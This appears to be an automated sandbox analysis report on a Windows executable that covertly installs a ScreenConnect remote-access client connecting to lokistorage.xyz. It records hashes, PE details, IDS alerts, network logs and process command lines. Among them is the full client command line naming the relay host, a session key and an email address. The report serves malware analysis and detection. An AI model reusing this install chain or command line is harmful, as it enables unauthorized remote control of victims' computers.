                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.428016723651666
                                                                Encrypted:false
                                                                SSDEEP:48:0peuyK+xFX49T5hUc/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl5+A:UeXeTXf+KpKfVkud6l/XtQopASlLF
                                                                MD5:3DF1741BDC4A091D6C29A3225B4DBB73
                                                                SHA1:F7E5796C616EF1B6A64DA5166D6A2EDD8E70D156
                                                                SHA-256:51D8AA96E90493C1CF3FFABEF40347D0BD156A9CB54DC9751D5450E00AF55F40
                                                                SHA-512:9CAD35B59D88AF089FFB4B2010AD911558E8515810599A2B9F381D7A360538CE05A7BDFDD23EC5ABC73EA3D5592805CA5DEEBFD08361BE4283A8A5C920B3128B
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.8099886272979215
                                                                Encrypted:false
                                                                SSDEEP:48:d8Ph2uRc06WX4EBT52/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl59:Ah210BTa+KpKfVkud6l/XtQopASlLF
                                                                MD5:FB890F1A0E8414434E029B25BC333FE5
                                                                SHA1:EFD563C8E1B3EF350BB7691C65F83A8F98573C20
                                                                SHA-256:4E8049FC7C63212735EBFFD416118610CEA1D5774409EE2400DABDB241C1A36B
                                                                SHA-512:FFC4887E5F9B10B358D97CCE4AFFCD65C8480F1127BCAD2F7B1E5DC19CDCAA8FF64DEA760A1E2D31A5A1DFC8C775AE40CBF73FCE3BF0B249ED5CAB50C272305B
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.06908461704519363
                                                                Encrypted:false
                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO6o2ZIAFQQvQGyVky6l3X:2F0i8n0itFzDHF6hZIyFvQE3X
                                                                MD5:0D464A055388209C1B8CE2EED7592EF4
                                                                SHA1:A83F7DA40EB76C4E6417A1BB723F773D597C8652
                                                                SHA-256:D332618E2397667EE2D61B5A58B5332FA8B656E071BF40A130C2B018C65B6A28
                                                                SHA-512:5E3EF10FB63B033FD6065DC3CF43013F209B198D7DD6DA998E71848ED6C223E8BB8372F1F8CC3BBBAEE6431630DF60B877A6E02EE636E20F7F1256AEC9ADC41A
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.8099886272979215
                                                                Encrypted:false
                                                                SSDEEP:48:d8Ph2uRc06WX4EBT52/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl59:Ah210BTa+KpKfVkud6l/XtQopASlLF
                                                                MD5:FB890F1A0E8414434E029B25BC333FE5
                                                                SHA1:EFD563C8E1B3EF350BB7691C65F83A8F98573C20
                                                                SHA-256:4E8049FC7C63212735EBFFD416118610CEA1D5774409EE2400DABDB241C1A36B
                                                                SHA-512:FFC4887E5F9B10B358D97CCE4AFFCD65C8480F1127BCAD2F7B1E5DC19CDCAA8FF64DEA760A1E2D31A5A1DFC8C775AE40CBF73FCE3BF0B249ED5CAB50C272305B
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):69632
                                                                Entropy (8bit):0.2385737235825634
                                                                Encrypted:false
                                                                SSDEEP:48:dSUDBAdubS3qcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl5+rM4qE/:ssxpKfVkud6l/XtQopASl74
                                                                MD5:E5553450BC62293C035A52BE0C41E8F0
                                                                SHA1:87E79A7AA85CB0756FC3ABC87FB5ED22DBB15E4E
                                                                SHA-256:CD634C4877E39DE40FB89DE0EB60C1672F030F8046ADF0486EF4EC3BAE77963E
                                                                SHA-512:5CC4592B2E899DD70F027E1B62F034C783E43FF9657FBEB64C377E11B7A2EE0AA678E01127C9B4EB0700B863E89DFF4CCDE7DB572180313A9F40288313D530DB
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.431214976564894
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:lat0Kwfbuj.exe
                                                                File size:5'639'944 bytes
                                                                MD5:51f8a6e0438ee3b616c5768326a30ede
                                                                SHA1:4f46a0f80fd001cff87f747ce43551aae8da15c4
                                                                SHA256:723553540a5bdd7ae07408bceef12e9b4feb1b572a5c0d30c251fe2bdf4bc5bf
                                                                SHA512:8a97063816d8312bac5834129b8c37f106be3c9bf64bbd4994f9fa2ec360d9ee84fc0555de04a96dce23f17171fe74c40185e8a1526a42709d97c654402a57fc
                                                                SSDEEP:98304:Z4s6efPOEnXkHywo+EVhaecMUzG4uc96ob2:afefPFZs6Uruc9Xb
                                                                TLSH:9146E001B3D599B9D5BF0678D87A42695A34BC048316CBFF97D0BD292E32BC04E32766
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                Icon Hash:00928e8e8686b000
                                                                Entrypoint:0x4014ad
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                Signature Valid:true
                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                Signature Validation Error:The operation completed successfully
                                                                Error Number:0
                                                                Not Before, Not After
                                                                • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                Subject Chain
                                                                • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                Version:3
                                                                Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                Serial:0B9360051BCCF66642998998D5BA97CE
                                                                Instruction
                                                                call 00007F55D4521D4Ah
                                                                jmp 00007F55D45217FFh
                                                                push ebp
                                                                mov ebp, esp
                                                                push 00000000h
                                                                call dword ptr [0040D040h]
                                                                push dword ptr [ebp+08h]
                                                                call dword ptr [0040D03Ch]
                                                                push C0000409h
                                                                call dword ptr [0040D044h]
                                                                push eax
                                                                call dword ptr [0040D048h]
                                                                pop ebp
                                                                ret
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 00000324h
                                                                push 00000017h
                                                                call dword ptr [0040D04Ch]
                                                                test eax, eax
                                                                je 00007F55D4521987h
                                                                push 00000002h
                                                                pop ecx
                                                                int 29h
                                                                mov dword ptr [004148D8h], eax
                                                                mov dword ptr [004148D4h], ecx
                                                                mov dword ptr [004148D0h], edx
                                                                mov dword ptr [004148CCh], ebx
                                                                mov dword ptr [004148C8h], esi
                                                                mov dword ptr [004148C4h], edi
                                                                mov word ptr [004148F0h], ss
                                                                mov word ptr [004148E4h], cs
                                                                mov word ptr [004148C0h], ds
                                                                mov word ptr [004148BCh], es
                                                                mov word ptr [004148B8h], fs
                                                                mov word ptr [004148B4h], gs
                                                                pushfd
                                                                pop dword ptr [004148E8h]
                                                                mov eax, dword ptr [ebp+00h]
                                                                mov dword ptr [004148DCh], eax
                                                                mov eax, dword ptr [ebp+04h]
                                                                mov dword ptr [004148E0h], eax
                                                                lea eax, dword ptr [ebp+08h]
                                                                mov dword ptr [004148ECh], eax
                                                                mov eax, dword ptr [ebp-00000324h]
                                                                mov dword ptr [00414828h], 00010001h
                                                                Programming Language:
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 build 21022
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x53747c.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x54a6000x16908
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x54e0000xea8.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x160000x53747c0x5376009031d2d9e81b0f6feb6373861cf5cdaaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x54e0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                FILES0x163d40x85600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.3967589473992502
                                                                FILES0x9b9d40x1a4400PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5110044479370117
                                                                FILES0x23fdd40x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.44113244742990654
                                                                FILES0x25a9d40x2f1320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9811086654663086
                                                                FILES0x54bcf40x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                RT_MANIFEST0x54d2f40x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                DLLImport
                                                                mscoree.dllCorBindToRuntimeEx
                                                                KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-12T18:40:29.296821+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.649775TCP
                                                                2024-11-12T18:41:06.957976+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.649801TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 12, 2024 18:40:18.214548111 CET497238041192.168.2.695.164.16.15
                                                                Nov 12, 2024 18:40:18.220057011 CET80414972395.164.16.15192.168.2.6
                                                                Nov 12, 2024 18:40:18.220190048 CET497238041192.168.2.695.164.16.15
                                                                Nov 12, 2024 18:40:19.941950083 CET497238041192.168.2.695.164.16.15
                                                                Nov 12, 2024 18:40:19.946794987 CET80414972395.164.16.15192.168.2.6
                                                                Nov 12, 2024 18:40:20.211508989 CET80414972395.164.16.15192.168.2.6
                                                                Nov 12, 2024 18:40:20.276869059 CET497238041192.168.2.695.164.16.15
                                                                Nov 12, 2024 18:40:20.281742096 CET80414972395.164.16.15192.168.2.6
                                                                Nov 12, 2024 18:40:20.541460991 CET80414972395.164.16.15192.168.2.6
                                                                Nov 12, 2024 18:40:20.541605949 CET80414972395.164.16.15192.168.2.6
                                                                Nov 12, 2024 18:40:20.541666985 CET497238041192.168.2.695.164.16.15
                                                                Nov 12, 2024 18:40:24.378657103 CET497238041192.168.2.695.164.16.15
                                                                Nov 12, 2024 18:40:24.378695011 CET497238041192.168.2.695.164.16.15
                                                                Nov 12, 2024 18:40:24.383724928 CET80414972395.164.16.15192.168.2.6
                                                                Nov 12, 2024 18:40:24.383735895 CET80414972395.164.16.15192.168.2.6
                                                                Nov 12, 2024 18:40:24.383795023 CET80414972395.164.16.15192.168.2.6
                                                                Nov 12, 2024 18:40:24.384676933 CET80414972395.164.16.15192.168.2.6
                                                                Nov 12, 2024 18:40:24.385344028 CET80414972395.164.16.15192.168.2.6
                                                                Nov 12, 2024 18:41:24.391097069 CET497238041192.168.2.695.164.16.15
                                                                Nov 12, 2024 18:41:24.615722895 CET80414972395.164.16.15192.168.2.6
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 12, 2024 18:40:18.109328032 CET6537953192.168.2.61.1.1.1
                                                                Nov 12, 2024 18:40:18.149705887 CET53653791.1.1.1192.168.2.6
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 12, 2024 18:40:18.109328032 CET192.168.2.61.1.1.10xb671Standard query (0)lokistorage.xyzA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 12, 2024 18:40:18.149705887 CET1.1.1.1192.168.2.60xb671No error (0)lokistorage.xyz95.164.16.15A (IP address)IN (0x0001)false

                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:12:40:11
                                                                Start date:12/11/2024
                                                                Path:C:\Users\user\Desktop\lat0Kwfbuj.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\lat0Kwfbuj.exe"
                                                                Imagebase:0xb00000
                                                                File size:5'639'944 bytes
                                                                MD5 hash:51F8A6E0438EE3B616C5768326A30EDE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2222155530.0000000005600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2207287516.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:12:40:12
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
                                                                Imagebase:0xbc0000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:12:40:12
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\System32\msiexec.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                Imagebase:0x7ff7d5b40000
                                                                File size:69'632 bytes
                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:4
                                                                Start time:12:40:13
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding AEF3BD45AE3AC68FA3C1F0BB226B94AD C
                                                                Imagebase:0xbc0000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:12:40:13
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI805D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4752015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                Imagebase:0xe60000
                                                                File size:61'440 bytes
                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:12:40:15
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 1AEB7D6AE800B379962CD8E66BA70200
                                                                Imagebase:0xbc0000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:12:40:16
                                                                Start date:12/11/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 297D060039D81CAE5710DC99E60A4A0C E Global\MSI0000
                                                                Imagebase:0xbc0000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:12:40:16
                                                                Start date:12/11/2024
                                                                Path:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=8c30d271-264f-488c-94af-041784a36368&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=michalgasper2%40gmail.com&c=kristof%20horvat&c=&c=&c=&c=&c=&c=&c="
                                                                Imagebase:0x290000
                                                                File size:95'520 bytes
                                                                MD5 hash:826314610D9E854477B08666330940B5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:9
                                                                Start time:12:40:17
                                                                Start date:12/11/2024
                                                                Path:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "b15bf990-c25d-4951-af9a-ebda90b58672" "User"
                                                                Imagebase:0x4f0000
                                                                File size:598'816 bytes
                                                                MD5 hash:AB5FA8D90645878D587F386D0E276C02
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:10
                                                                Start time:12:40:22
                                                                Start date:12/11/2024
                                                                Path:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "61fcd7ba-9a06-4116-a3ec-642fd4d2ceac" "System"
                                                                Imagebase:0xcd0000
                                                                File size:598'816 bytes
                                                                MD5 hash:AB5FA8D90645878D587F386D0E276C02
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Reset < >
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2222034546.00000000055E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_55e0000_lat0Kwfbuj.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: e6b9e90e90dd83adf06107bf3a8d090254b39bfb7752edecf684db04a837f545
                                                                  • Instruction ID: cf71b72f187637dbc452e52eae3a53135486674d3cf0ec4232eff04e009c05f4
                                                                  • Opcode Fuzzy Hash: e6b9e90e90dd83adf06107bf3a8d090254b39bfb7752edecf684db04a837f545
                                                                  • Instruction Fuzzy Hash: E6527A34A00218CFDB15EF64D845BADBBB6FF89300F1085A9E809AB355DB71AD85CF90
                                                                  Strings
                                                                  Memory Dump Source
